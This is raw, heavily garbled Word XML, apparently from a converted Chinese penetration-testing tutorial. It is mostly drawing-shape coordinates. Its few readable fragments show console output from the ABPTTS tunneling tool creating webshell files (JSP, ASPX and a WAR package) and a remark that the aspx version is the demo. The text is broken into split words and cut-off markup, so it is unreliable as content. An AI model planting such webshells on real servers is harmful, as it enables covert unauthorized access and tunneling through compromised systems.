4241,6652,4241,6651,4241,6650,4241,6649,4241,6647,4241,6646,4241,6644,4241,6643,4241,6641,4241,6640,4241,6638,4241,6636,4241,6635,4241,6633,4241,6631,4241,6629,4241,6627,4241,6625,4241,6623,4241,6620,4241,6618,4241,6616,4241,6613,4241,6611,4241,6608,4241,6606,4241,6603,4241,6601,4241,6598,4241,6595,4241,6592,4241,6589,4241,6586,4241,6583,4241,6579,4241,6576,4241,6573,4241,6569,4241,6566,4241,6562,4241,6558,4241,6554,4241,6551,4241,6547,4241,6543,4241,6538,4241,6534,4241,6530,4241,6525,4241,6521,4241,6516,4241,6512,4241,6507,4241,6502,4241,6497,4241,6492,4241,6487,4241,6482,4241,6476,4241,6471,4241,6465,4241,6460,4241,6454,4241,6448,4241,6442,4241,6436,4241,6430,4241,6424,4241,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:374.399pt;width:467.400pt;height:198.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28.132722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Client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side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configuration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file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will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wr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itten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as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"/root/ABPTTS/webshell/config.txt"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28.132739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"/root/ABPTTS/data/american‐english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‐lowercase‐4‐64.txt"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as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wordlist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file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28.136713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Created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configuration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file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"/root/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ABPTTS/web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shell/config.txt"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28.137760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Created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file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"/root/ABPTTS/webshel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l/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abptts.jsp"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28.138342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Created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file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"/root/ABPTTS/webshel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l/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abptts.aspx"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28.138492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Created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file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"/root/ABPTTS/webshel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l/war/W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EB‐INF/web.xml"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28.138555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Created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file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"/root/ABPTTS/webshel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l/war/META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‐INF/MANIFEST.MF"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28.139128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Prebuilt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JSP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WAR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file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ABPTTS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websh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ell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scabGroup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war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3020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24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28.139140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Unpacked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WAR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file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contents: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root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ABPTTS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webshell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war</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="13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26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37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0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>以a</w:t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spx为demo。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291.500pt;width:0.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,5830" coordsize="10,690">
        <v:shape style="position:absolute;left:10390;top:5830;width:10;height:690" coordorigin="10390,5830" coordsize="10,690" path="m10402,5847l10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5847,10402,5848,10402,5848,10402,5848,10402,5848,10402,5849,10402,5849,10402,5849,10402,5850,10402,5850,10402,5851,10402,5851,10402,5852,10402,5852,10402,5853,10402,5854,10402,5855,10402,5856,10402,5857,10402,5858,10402,5859,10402,5860,10402,5861,10402,5863,10402,5864,10402,5866,10402,5867,10402,5869,10402,5871,10402,5873,10402,5875,10402,5877,10402,5879,10402,5881,10402,5883,10402,5886,10402,5889,10402,5891,10402,5894,10402,5897,10402,5900,10402,5903,10402,5907,10402,5910,10402,5914,10402,5917,10402,5921,10402,5925,10402,5929,10402,5934,10402,5938,10402,5942,10402,5947,10402,5952,10402,5957,10402,5962,10402,5967,10402,5973,10402,5979,10402,5984,10402,5990,10402,5997,10402,6003,10402,6009,10402,6016,10402,6023,10402,6030,10402,6037,10402,6045,10402,6052,10402,6060,10402,6068,10402,6076,10402,6084,10402,6093,10402,6102,10402,6111,10402,6120,10402,6129,10402,6139,10402,6149,10402,6159,10402,6169,10402,6180,10402,6191,10402,6202,10402,6213,10402,6224,10402,6236,10402,6248,10402,6260,10402,6272,10402,6285,10402,6298,10402,6311,10402,6324,10402,6338,10402,6352,10402,6366,10402,6380,10402,6395,10402,6410,10402,6425,10402,6441,10402,6456,10402,6472,10402,6489,10402,6505,10402,6522e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:291.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5830" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:5830;width:8990;height:690" coordorigin="1490,5830" coordsize="8990,690" path="m1510,5847l1510,5847,1510,5847,1510,5847,1510,5847,1510,5847,1510,5847,1511,5847,1512,5847,1512,5847,1514,5847,1515,5847,1517,5847,1519,5847,1521,5847,1524,5847,1528,5847,1532,5847,1536,5847,1541,5847,1546,5847,1552,5847,1559,5847,1566,5847,1575,5847,1583,5847,1593,5847,1603,5847,1615,5847,1627,5847,1640,5847,1654,5847,1668,5847,1684,5847,1701,5847,1719,5847,1738,5847,1758,5847,1780,5847,1802,5847,1826,5847,1851,5847,1877,5847,1904,5847,1933,5847,1963,5847,1995,5847,2028,5847,2063,5847,2099,5847,2136,5847,2175,5847,2216,5847,2259,5847,2303,5847,2348,5847,2396,5847,2445,5847,2496,5847,2549,5847,2604,5847,2660,5847,2719,5847,2779,5847,2841,5847,2906,5847,2972,5847,3041,5847,3112,5847,3184,5847,3259,5847,3336,5847,3416,5847,3498,5847,3582,5847,3668,5847,3757,5847,3848,5847,3941,5847,4037,5847,4136,5847,4236,5847,4340,5847,4446,5847,4555,5847,4666,5847,4780,5847,4897,5847,5017,5847,5139,5847,5264,5847,5392,5847,5523,5847,5657,5847,5793,5847,5933,5847,6076,5847,6222,5847,6370,5847,6522,5847,6677,5847,6835,5847,6997,5847,7161,5847,7329,5847,7500,5847,7675,5847,7853,5847,8034,5847,8219,5847,8407,5847,8598,5847,8793,5847,8992,5847,9194,5847,9400,5847,9609,5847,9823,5847,10039,5847,10260,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5847,10484,5848,10484,5848,10484,5848,10484,5848,10484,5849,10484,5849,10484,5849,10484,5850,10484,5850,10484,5851,10484,5851,10484,5852,10484,5852,10484,5853,10484,5854,10484,5855,10484,5856,10484,5857,10484,5858,10484,5859,10484,5860,10484,5861,10484,5863,10484,5864,10484,5866,10484,5867,10484,5869,10484,5871,10484,5873,10484,5875,10484,5877,10484,5879,10484,5881,10484,5883,10484,5886,10484,5889,10484,5891,10484,5894,10484,5897,10484,5900,10484,5903,10484,5907,10484,5910,10484,5914,10484,5917,10484,5921,10484,5925,10484,5929,10484,5934,10484,5938,10484,5942,10484,5947,10484,5952,10484,5957,10484,5962,10484,5967,10484,5973,10484,5979,10484,5984,10484,5990,10484,5997,10484,6003,10484,6009,10484,6016,10484,6023,10484,6030,10484,6037,10484,6045,10484,6052,10484,6060,10484,6068,10484,6076,10484,6084,10484,6093,10484,6102,10484,6111,10484,6120,10484,6129,10484,6139,10484,6149,10484,6159,10484,6169,10484,6180,10484,6191,10484,6202,10484,6213,10484,6224,10484,6236,10484,6248,10484,6260,10484,6272,10484,6285,10484,6298,10484,6311,10484,6324,10484,6338,10484,6352,10484,6366,10484,6380,10484,6395,10484,6410,10484,6425,10484,6441,10484,6456,10484,6472,10484,6489,10484,6505,10484,6522,10484,6522,10484,6522,10484,6522,10484,6522,10484,6522,10484,6522,10483,6522,10482,6522,10482,6522,10480,6522,10479,6522,10477,6522,10475,6522,10473,6522,10470,6522,10466,6522,10462,6522,10458,6522,10453,6522,10448,6522,10442,6522,10435,6522,10428,6522,10419,6522,10411,6522,10401,6522,10391,6522,10379,6522,10367,6522,10354,6522,10340,6522,10326,6522,10310,6522,10293,6522,10275,6522,10256,6522,10236,6522,10215,6522,10192,6522,10168,6522,10143,6522,10117,6522,10090,6522,10061,6522,10031,6522,9999,6522,9966,6522,9931,6522,9895,6522,9858,6522,9819,6522,9778,6522,9735,6522,9691,6522,9646,6522,9598,6522,9549,6522,9498,6522,9445,6522,9391,6522,9334,6522,9275,6522,9215,6522,9153,6522,9088,6522,9022,6522,8953,6522,8883,6522,8810,6522,8735,6522,8658,6522,8578,6522,8497,6522,8413,6522,8326,6522,8238,6522,8146,6522,8053,6522,7957,6522,7859,6522,7758,6522,7654,6522,7548,6522,7439,6522,7328,6522,7214,6522,7097,6522,6977,6522,6855,6522,6730,6522,6602,6522,6471,6522,6337,6522,6201,6522,6061,6522,5918,6522,5773,6522,5624,6522,5472,6522,5317,6522,5159,6522,4997,6522,4833,6522,4665,6522,4494,6522,4319,6522,4141,6522,3960,6522,3776,6522,3587,6522,3396,6522,3201,6522,3002,6522,2800,6522,2594,6522,2385,6522,2172,6522,1955,6522,1734,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6522,1510,6521,1510,6521,1510,6521,1510,6521,1510,6520,1510,6520,1510,6520,1510,6519,1510,6519,1510,6518,1510,6517,1510,6517,1510,6516,1510,6515,1510,6514,1510,6513,1510,6513,1510,6511,1510,6510,1510,6509,1510,6508,1510,6507,1510,6505,1510,6504,1510,6502,1510,6500,1510,6499,1510,6497,1510,6495,1510,6493,1510,6490,1510,6488,1510,6486,1510,6483,1510,6481,1510,6478,1510,6475,1510,6472,1510,6469,1510,6466,1510,6463,1510,6459,1510,6456,1510,6452,1510,6448,1510,6444,1510,6440,1510,6436,1510,6431,1510,6427,1510,6422,1510,6417,1510,6412,1510,6407,1510,6402,1510,6396,1510,6391,1510,6385,1510,6379,1510,6373,1510,6366,1510,6360,1510,6353,1510,6346,1510,6339,1510,6332,1510,6325,1510,6317,1510,6309,1510,6301,1510,6293,1510,6285,1510,6276,1510,6267,1510,6258,1510,6249,1510,6240,1510,6230,1510,6220,1510,6210,1510,6200,1510,6189,1510,6179,1510,6168,1510,6157,1510,6145,1510,6133,1510,6122,1510,6109,1510,6097,1510,6084,1510,6071,1510,6058,1510,6045,1510,6031,1510,6017,1510,6003,1510,5989,1510,5974,1510,5959,1510,5944,1510,5929,1510,5913,1510,5897,1510,5880,1510,5864,1510,5847e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:291.600pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:347.149pt;width:0.0pt;height:494.850pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,6942" coordsize="0,9897">
        <v:shape style="position:absolute;left:10402;top:6942;width:0;height:9897" coordorigin="10402,6942" coordsize="0,9897" path="m10402,6942l10402,6942,10402,6943,10402,6943,10402,6943,10402,6943,10402,6943,10402,6944,10402,6945,10402,6946,10402,6947,10402,6948,10402,6950,10402,6953,10402,6955,10402,6959,10402,6962,10402,6967,10402,6971,10402,6977,10402,6983,10402,6989,10402,6997,10402,7005,10402,7014,10402,7024,10402,7034,10402,7046,10402,7058,10402,7071,10402,7086,10402,7101,10402,7117,10402,7135,10402,7154,10402,7173,10402,7194,10402,7217,10402,7240,10402,7265,10402,7291,10402,7318,10402,7347,10402,7378,10402,7409,10402,7443,10402,7478,10402,7514,10402,7552,10402,7592,10402,7633,10402,7677,10402,7722,10402,7768,10402,7817,10402,7867,10402,7920,10402,7974,10402,8030,10402,8088,10402,8149,10402,8211,10402,8276,10402,8342,10402,8411,10402,8482,10402,8555,10402,8631,10402,8709,10402,8789,10402,8872,10402,8957,10402,9045,10402,9135,10402,9227,10402,9322,10402,9420,10402,9521,10402,9624,10402,9730,10402,9838,10402,9949,10402,10064,10402,10181,10402,10301,10402,10423,10402,10549,10402,10678,10402,10810,10402,10945,10402,11083,10402,11224,10402,11368,10402,11516,10402,11667,10402,11821,10402,11978,10402,12139,10402,12303,10402,12470,10402,12641,10402,12816,10402,12993,10402,13175,10402,13360,10402,13549,10402,13741,10402,13937,10402,14137,10402,14341,10402,14548,10402,14760,10402,14975,10402,15194,10402,15417,10402,15644,10402,15875,10402,16110,10402,16349,10402,16592,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:346.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6930" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:6930;width:8990;height:910" coordorigin="1490,6930" coordsize="8990,910" path="m1510,6942l1510,6942,1510,6942,1510,6942,1510,6942,1510,6942,1510,6942,1511,6942,1512,6942,1512,6942,1514,6942,1515,6942,1517,6942,1519,6942,1521,6942,1524,6942,1528,6942,1532,6942,1536,6942,1541,6942,1546,6942,1552,6942,1559,6942,1566,6942,1575,6942,1583,6942,1593,6942,1603,6942,1615,6942,1627,6942,1640,6942,1654,6942,1668,6942,1684,6942,1701,6942,1719,6942,1738,6942,1758,6942,1780,6942,1802,6942,1826,6942,1851,6942,1877,6942,1904,6942,1933,6942,1963,6942,1995,6942,2028,6942,2063,6942,2099,6942,2136,6942,2175,6942,2216,6942,2259,6942,2303,6942,2348,6942,2396,6942,2445,6942,2496,6942,2549,6942,2604,6942,2660,6942,2719,6942,2779,6942,2841,6942,2906,6942,2972,6942,3041,6942,3112,6942,3184,6942,3259,6942,3336,6942,3416,6942,3498,6942,3582,6942,3668,6942,3757,6942,3848,6942,3941,6942,4037,6942,4136,6942,4236,6942,4340,6942,4446,6942,4555,6942,4666,6942,4780,6942,4897,6942,5017,6942,5139,6942,5264,6942,5392,6942,5523,6942,5657,6942,5793,6942,5933,6942,6076,6942,6222,6942,6370,6942,6522,6942,6677,6942,6835,6942,6997,6942,7161,6942,7329,6942,7500,6942,7675,6942,7853,6942,8034,6942,8219,6942,8407,6942,8598,6942,8793,6942,8992,6942,9194,6942,9400,6942,9609,6942,9823,6942,10039,6942,10260,6942,10484,6942,10484,6942,10484,6942,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6943,10484,6944,10484,6944,10484,6944,10484,6945,10484,6945,10484,6946,10484,6946,10484,6947,10484,6948,10484,6948,10484,6949,10484,6950,10484,6951,10484,6952,10484,6953,10484,6954,10484,6956,10484,6957,10484,6959,10484,6960,10484,6962,10484,6964,10484,6966,10484,6968,10484,6970,10484,6972,10484,6975,10484,6977,10484,6980,10484,6983,10484,6986,10484,6989,10484,6992,10484,6995,10484,6999,10484,7003,10484,7006,10484,7010,10484,7015,10484,7019,10484,7023,10484,7028,10484,7033,10484,7038,10484,7043,10484,7048,10484,7054,10484,7060,10484,7066,10484,7072,10484,7078,10484,7085,10484,7092,10484,7099,10484,7106,10484,7113,10484,7121,10484,7129,10484,7137,10484,7145,10484,7154,10484,7163,10484,7172,10484,7181,10484,7191,10484,7200,10484,7210,10484,7221,10484,7231,10484,7242,10484,7253,10484,7264,10484,7276,10484,7288,10484,7300,10484,7313,10484,7325,10484,7339,10484,7352,10484,7366,10484,7379,10484,7394,10484,7408,10484,7423,10484,7438,10484,7454,10484,7470,10484,7486,10484,7502,10484,7519,10484,7536,10484,7554,10484,7571,10484,7590,10484,7608,10484,7627,10484,7646,10484,7666,10484,7685,10484,7706,10484,7726,10484,7747,10484,7769,10484,7790,10484,7813,10484,7835,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10483,7858,10482,7858,10482,7858,10480,7858,10479,7858,10477,7858,10475,7858,10473,7858,10470,7858,10466,7858,10462,7858,10458,7858,10453,7858,10448,7858,10442,7858,10435,7858,10428,7858,10419,7858,10411,7858,10401,7858,10391,7858,10379,7858,10367,7858,10354,7858,10340,7858,10326,7858,10310,7858,10293,7858,10275,7858,10256,7858,10236,7858,10215,7858,10192,7858,10168,7858,10143,7858,10117,7858,10090,7858,10061,7858,10031,7858,9999,7858,9966,7858,9931,7858,9895,7858,9858,7858,9819,7858,9778,7858,9735,7858,9691,7858,9646,7858,9598,7858,9549,7858,9498,7858,9445,7858,9391,7858,9334,7858,9275,7858,9215,7858,9153,7858,9088,7858,9022,7858,8953,7858,8883,7858,8810,7858,8735,7858,8658,7858,8578,7858,8497,7858,8413,7858,8326,7858,8238,7858,8146,7858,8053,7858,7957,7858,7859,7858,7758,7858,7654,7858,7548,7858,7439,7858,7328,7858,7214,7858,7097,7858,6977,7858,6855,7858,6730,7858,6602,7858,6471,7858,6337,7858,6201,7858,6061,7858,5918,7858,5773,7858,5624,7858,5472,7858,5317,7858,5159,7858,4997,7858,4833,7858,4665,7858,4494,7858,4319,7858,4141,7858,3960,7858,3776,7858,3587,7858,3396,7858,3201,7858,3002,7858,2800,7858,2594,7858,2385,7858,2172,7858,1955,7858,1734,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7857,1510,7857,1510,7857,1510,7857,1510,7856,1510,7856,1510,7856,1510,7855,1510,7855,1510,7854,1510,7854,1510,7853,1510,7852,1510,7851,1510,7850,1510,7849,1510,7848,1510,7847,1510,7846,1510,7845,1510,7843,1510,7842,1510,7840,1510,7838,1510,7837,1510,7835,1510,7833,1510,7830,1510,7828,1510,7826,1510,7823,1510,7821,1510,7818,1510,7815,1510,7812,1510,7808,1510,7805,1510,7802,1510,7798,1510,7794,1510,7790,1510,7786,1510,7782,1510,7777,1510,7772,1510,7768,1510,7763,1510,7757,1510,7752,1510,7746,1510,7741,1510,7735,1510,7728,1510,7722,1510,7716,1510,7709,1510,7702,1510,7695,1510,7687,1510,7679,1510,7672,1510,7664,1510,7655,1510,7647,1510,7638,1510,7629,1510,7619,1510,7610,1510,7600,1510,7590,1510,7580,1510,7569,1510,7558,1510,7547,1510,7536,1510,7524,1510,7512,1510,7500,1510,7488,1510,7475,1510,7462,1510,7449,1510,7435,1510,7421,1510,7407,1510,7392,1510,7377,1510,7362,1510,7347,1510,7331,1510,7315,1510,7298,1510,7281,1510,7264,1510,7247,1510,7229,1510,7211,1510,7192,1510,7174,1510,7154,1510,7135,1510,7115,1510,7095,1510,7074,1510,7053,1510,7032,1510,7010,1510,6988,1510,6965,1510,6942e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:345.600pt;width:445.800pt;height:47.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:391.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7830" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:7830;width:8990;height:670" coordorigin="1490,7830" coordsize="8990,670" path="m1510,7858l1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1510,7858,1511,7858,1512,7858,1512,7858,1514,7858,1515,7858,1517,7858,1519,7858,1521,7858,1524,7858,1528,7858,1532,7858,1536,7858,1541,7858,1546,7858,1552,7858,1559,7858,1566,7858,1575,7858,1583,7858,1593,7858,1603,7858,1615,7858,1627,7858,1640,7858,1654,7858,1668,7858,1684,7858,1701,7858,1719,7858,1738,7858,1758,7858,1780,7858,1802,7858,1826,7858,1851,7858,1877,7858,1904,7858,1933,7858,1963,7858,1995,7858,2028,7858,2063,7858,2099,7858,2136,7858,2175,7858,2216,7858,2259,7858,2303,7858,2348,7858,2396,7858,2445,7858,2496,7858,2549,7858,2604,7858,2660,7858,2719,7858,2779,7858,2841,7858,2906,7858,2972,7858,3041,7858,3112,7858,3184,7858,3259,7858,3336,7858,3416,7858,3498,7858,3582,7858,3668,7858,3757,7858,3848,7858,3941,7858,4037,7858,4136,7858,4236,7858,4340,7858,4446,7858,4555,7858,4666,7858,4780,7858,4897,7858,5017,7858,5139,7858,5264,7858,5392,7858,5523,7858,5657,7858,5793,7858,5933,7858,6076,7858,6222,7858,6370,7858,6522,7858,6677,7858,6835,7858,6997,7858,7161,7858,7329,7858,7500,7858,7675,7858,7853,7858,8034,7858,8219,7858,8407,7858,8598,7858,8793,7858,8992,7858,9194,7858,9400,7858,9609,7858,9823,7858,10039,7858,10260,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7858,10484,7859,10484,7859,10484,7859,10484,7859,10484,7860,10484,7860,10484,7860,10484,7861,10484,7861,10484,7862,10484,7862,10484,7863,10484,7863,10484,7864,10484,7865,10484,7865,10484,7866,10484,7867,10484,7868,10484,7869,10484,7871,10484,7872,10484,7873,10484,7874,10484,7876,10484,7877,10484,7879,10484,7881,10484,7882,10484,7884,10484,7886,10484,7888,10484,7891,10484,7893,10484,7895,10484,7898,10484,7900,10484,7903,10484,7906,10484,7909,10484,7912,10484,7915,10484,7918,10484,7922,10484,7925,10484,7929,10484,7933,10484,7937,10484,7941,10484,7945,10484,7949,10484,7954,10484,7958,10484,7963,10484,7968,10484,7973,10484,7978,10484,7984,10484,7989,10484,7995,10484,8001,10484,8007,10484,8013,10484,8020,10484,8026,10484,8033,10484,8040,10484,8047,10484,8054,10484,8061,10484,8069,10484,8077,10484,8085,10484,8093,10484,8102,10484,8110,10484,8119,10484,8128,10484,8137,10484,8147,10484,8156,10484,8166,10484,8176,10484,8186,10484,8197,10484,8207,10484,8218,10484,8230,10484,8241,10484,8253,10484,8264,10484,8276,10484,8289,10484,8301,10484,8314,10484,8327,10484,8340,10484,8354,10484,8368,10484,8382,10484,8396,10484,8411,10484,8425,10484,8440,10484,8456,10484,8471,10484,8487,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10483,8503,10482,8503,10482,8503,10480,8503,10479,8503,10477,8503,10475,8503,10473,8503,10470,8503,10466,8503,10462,8503,10458,8503,10453,8503,10448,8503,10442,8503,10435,8503,10428,8503,10419,8503,10411,8503,10401,8503,10391,8503,10379,8503,10367,8503,10354,8503,10340,8503,10326,8503,10310,8503,10293,8503,10275,8503,10256,8503,10236,8503,10215,8503,10192,8503,10168,8503,10143,8503,10117,8503,10090,8503,10061,8503,10031,8503,9999,8503,9966,8503,9931,8503,9895,8503,9858,8503,9819,8503,9778,8503,9735,8503,9691,8503,9646,8503,9598,8503,9549,8503,9498,8503,9445,8503,9391,8503,9334,8503,9275,8503,9215,8503,9153,8503,9088,8503,9022,8503,8953,8503,8883,8503,8810,8503,8735,8503,8658,8503,8578,8503,8497,8503,8413,8503,8326,8503,8238,8503,8146,8503,8053,8503,7957,8503,7859,8503,7758,8503,7654,8503,7548,8503,7439,8503,7328,8503,7214,8503,7097,8503,6977,8503,6855,8503,6730,8503,6602,8503,6471,8503,6337,8503,6201,8503,6061,8503,5918,8503,5773,8503,5624,8503,5472,8503,5317,8503,5159,8503,4997,8503,4833,8503,4665,8503,4494,8503,4319,8503,4141,8503,3960,8503,3776,8503,3587,8503,3396,8503,3201,8503,3002,8503,2800,8503,2594,8503,2385,8503,2172,8503,1955,8503,1734,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8502,1510,8502,1510,8502,1510,8502,1510,8501,1510,8501,1510,8501,1510,8500,1510,8500,1510,8499,1510,8499,1510,8498,1510,8497,1510,8497,1510,8496,1510,8495,1510,8494,1510,8493,1510,8492,1510,8491,1510,8490,1510,8488,1510,8487,1510,8485,1510,8484,1510,8482,1510,8481,1510,8479,1510,8477,1510,8475,1510,8473,1510,8471,1510,8468,1510,8466,1510,8464,1510,8461,1510,8458,1510,8455,1510,8452,1510,8449,1510,8446,1510,8443,1510,8440,1510,8436,1510,8432,1510,8429,1510,8425,1510,8421,1510,8416,1510,8412,1510,8408,1510,8403,1510,8398,1510,8393,1510,8388,1510,8383,1510,8377,1510,8372,1510,8366,1510,8360,1510,8354,1510,8348,1510,8342,1510,8335,1510,8328,1510,8322,1510,8314,1510,8307,1510,8300,1510,8292,1510,8284,1510,8276,1510,8268,1510,8260,1510,8251,1510,8242,1510,8233,1510,8224,1510,8215,1510,8205,1510,8195,1510,8185,1510,8175,1510,8164,1510,8154,1510,8143,1510,8132,1510,8120,1510,8109,1510,8097,1510,8085,1510,8073,1510,8060,1510,8047,1510,8034,1510,8021,1510,8007,1510,7994,1510,7980,1510,7965,1510,7951,1510,7936,1510,7921,1510,7906,1510,7890,1510,7874,1510,7858e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:392.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7850" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:7850;width:30;height:650" coordorigin="1490,7850" coordsize="30,650" path="m1517,7858l1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7858,1517,7859,1517,7859,1517,7859,1517,7859,1517,7860,1517,7860,1517,7860,1517,7861,1517,7861,1517,7862,1517,7862,1517,7863,1517,7863,1517,7864,1517,7865,1517,7865,1517,7866,1517,7867,1517,7868,1517,7869,1517,7871,1517,7872,1517,7873,1517,7874,1517,7876,1517,7877,1517,7879,1517,7881,1517,7882,1517,7884,1517,7886,1517,7888,1517,7891,1517,7893,1517,7895,1517,7898,1517,7900,1517,7903,1517,7906,1517,7909,1517,7912,1517,7915,1517,7918,1517,7922,1517,7925,1517,7929,1517,7933,1517,7937,1517,7941,1517,7945,1517,7949,1517,7954,1517,7958,1517,7963,1517,7968,1517,7973,1517,7978,1517,7984,1517,7989,1517,7995,1517,8001,1517,8007,1517,8013,1517,8020,1517,8026,1517,8033,1517,8040,1517,8047,1517,8054,1517,8061,1517,8069,1517,8077,1517,8085,1517,8093,1517,8102,1517,8110,1517,8119,1517,8128,1517,8137,1517,8147,1517,8156,1517,8166,1517,8176,1517,8186,1517,8197,1517,8207,1517,8218,1517,8230,1517,8241,1517,8253,1517,8264,1517,8276,1517,8289,1517,8301,1517,8314,1517,8327,1517,8340,1517,8354,1517,8368,1517,8382,1517,8396,1517,8411,1517,8425,1517,8440,1517,8456,1517,8471,1517,8487,1517,8503e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:424.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8490" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:8490;width:8990;height:370" coordorigin="1490,8490" coordsize="8990,370" path="m1510,8503l1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1510,8503,1511,8503,1512,8503,1512,8503,1514,8503,1515,8503,1517,8503,1519,8503,1521,8503,1524,8503,1528,8503,1532,8503,1536,8503,1541,8503,1546,8503,1552,8503,1559,8503,1566,8503,1575,8503,1583,8503,1593,8503,1603,8503,1615,8503,1627,8503,1640,8503,1654,8503,1668,8503,1684,8503,1701,8503,1719,8503,1738,8503,1758,8503,1780,8503,1802,8503,1826,8503,1851,8503,1877,8503,1904,8503,1933,8503,1963,8503,1995,8503,2028,8503,2063,8503,2099,8503,2136,8503,2175,8503,2216,8503,2259,8503,2303,8503,2348,8503,2396,8503,2445,8503,2496,8503,2549,8503,2604,8503,2660,8503,2719,8503,2779,8503,2841,8503,2906,8503,2972,8503,3041,8503,3112,8503,3184,8503,3259,8503,3336,8503,3416,8503,3498,8503,3582,8503,3668,8503,3757,8503,3848,8503,3941,8503,4037,8503,4136,8503,4236,8503,4340,8503,4446,8503,4555,8503,4666,8503,4780,8503,4897,8503,5017,8503,5139,8503,5264,8503,5392,8503,5523,8503,5657,8503,5793,8503,5933,8503,6076,8503,6222,8503,6370,8503,6522,8503,6677,8503,6835,8503,6997,8503,7161,8503,7329,8503,7500,8503,7675,8503,7853,8503,8034,8503,8219,8503,8407,8503,8598,8503,8793,8503,8992,8503,9194,8503,9400,8503,9609,8503,9823,8503,10039,8503,10260,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8503,10484,8504,10484,8504,10484,8504,10484,8504,10484,8504,10484,8504,10484,8504,10484,8505,10484,8505,10484,8505,10484,8505,10484,8506,10484,8506,10484,8506,10484,8507,10484,8507,10484,8507,10484,8508,10484,8508,10484,8509,10484,8510,10484,8510,10484,8511,10484,8512,10484,8512,10484,8513,10484,8514,10484,8515,10484,8516,10484,8517,10484,8518,10484,8519,10484,8520,10484,8521,10484,8523,10484,8524,10484,8525,10484,8527,10484,8528,10484,8530,10484,8532,10484,8533,10484,8535,10484,8537,10484,8539,10484,8541,10484,8543,10484,8545,10484,8547,10484,8549,10484,8552,10484,8554,10484,8557,10484,8559,10484,8562,10484,8565,10484,8568,10484,8570,10484,8573,10484,8577,10484,8580,10484,8583,10484,8586,10484,8590,10484,8593,10484,8597,10484,8601,10484,8605,10484,8609,10484,8613,10484,8617,10484,8621,